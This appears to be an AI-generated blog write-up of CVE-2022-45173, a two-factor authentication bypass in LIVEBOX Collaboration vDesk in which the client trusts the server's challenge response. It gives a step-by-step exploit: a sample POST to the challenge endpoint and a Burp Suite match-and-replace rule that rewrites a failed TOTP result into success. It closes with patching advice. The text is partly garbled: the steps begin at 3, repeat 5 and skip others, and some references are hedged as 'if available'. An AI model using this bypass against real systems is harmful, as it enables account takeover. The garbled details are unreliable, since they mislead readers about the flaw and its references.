CVE-2022-45173 - Exploiting LIVEBOX Collaboration vDesk 2FA Bypass via Broken API Challenge

In late 2022, a critical vulnerability was discovered in the LIVEBOX Collaboration vDesk product (through version v018), tracked as CVE-2022-45173. This flaw exposes weak points in the application's implementation of two-factor authentication (2FA) and allows attackers to bypass it—rendering 2FA protections useless.

Let’s break down what this bug is, how you can exploit it, and why it’s such a big deal for organizations relying on vDesk.

What is CVE-2022-45173?

LIVEBOX Collaboration vDesk is a workplace collaboration platform. One security feature it offers is two-factor authentication, typically using Time-Based One-Time Passwords (TOTP). In theory, when a user logs in, the client sends the TOTP code to the server, which verifies it and responds according to whether the code is valid.

But in vDesk, a logic flaw exists:  
The /api/v1/vdeskintegration/challenge endpoint doesn’t *actually* confirm TOTP checks on the server-side. Instead, the server returns a response, and it’s left up to the client (the user's browser) to decide if the authentication is valid or not.

In other words: You can tell the app you passed 2FA, even if you failed!

2FA Prompt: User is asked for a TOTP code.

3. Code Sent: The browser/app sends the TOTP code to /api/v1/vdeskintegration/challenge.
4. Response Tamper: Instead of waiting for a real server check, the client just looks at the API response.
5. Bypass: An attacker can intercept the network traffic (using tools like Burp Suite or browser dev tools), and modify the response from the server to make it look like the check succeeded—regardless of the actual TOTP entered!

The client will send something like

POST /api/v1/vdeskintegration/challenge HTTP/1.1
Host: vdesk-victim.com
Content-Type: application/json

{
  "username": "victim",
  "totp": "123456"
}

If the TOTP is incorrect, the server might say

{"status": "failed", "message": "Invalid code"}

But here’s the issue: the result is not enforced by the backend!

Using a proxy like Burp Suite, simply modify the response on-the-fly to

{"status": "success", "message": "TOTP verified"}

5. Observe the Bypass

The frontend reads your *faked* "success" status and logs you into the victim's account—2FA defeated! The only thing needed is access to the login credentials, or the ability to brute-force/steal them.

Match:

- URL: /api/v1/vdeskintegration/challenge

With: "status":"success"

Now, *every* TOTP challenge will look like it’s been passed—no matter what code you enter!

References

- MITRE CVE: CVE-2022-45173
- Exploit Database: EDB-ID 51309 (if available)
- Vendor Advisory: LIVEBOX Security Page
- Disclosure Discussion: huntr.dev Advisory

Why Does This Happen?

TL;DR: The client (browser/user-side) code is trusted to verify security checks, instead of a robust server-side check.

Check your version: Admins should immediately audit for vulnerable versions.

- Web app design tip: Always do credential and TOTP checks on the server, and only ever trust the backend’s determinations for access control.

Conclusion

CVE-2022-45173 is an example of how even the best security features, like two-factor authentication, are useless if improperly implemented. Attackers could exploit this to gain unauthorized full access in LIVEBOX Collaboration vDesk, leaving data and communication wide open.

Admins should patch ASAP, and every developer should remember: *Critical security checks belong on the server, not the client*.


*Exclusive analysis by ChatGPT. For educational and awareness purposes only. Follow responsible disclosure processes!*

Timeline

Published on: 04/14/2023 14:15:00 UTC
Last modified on: 04/19/2023 19:28:00 UTC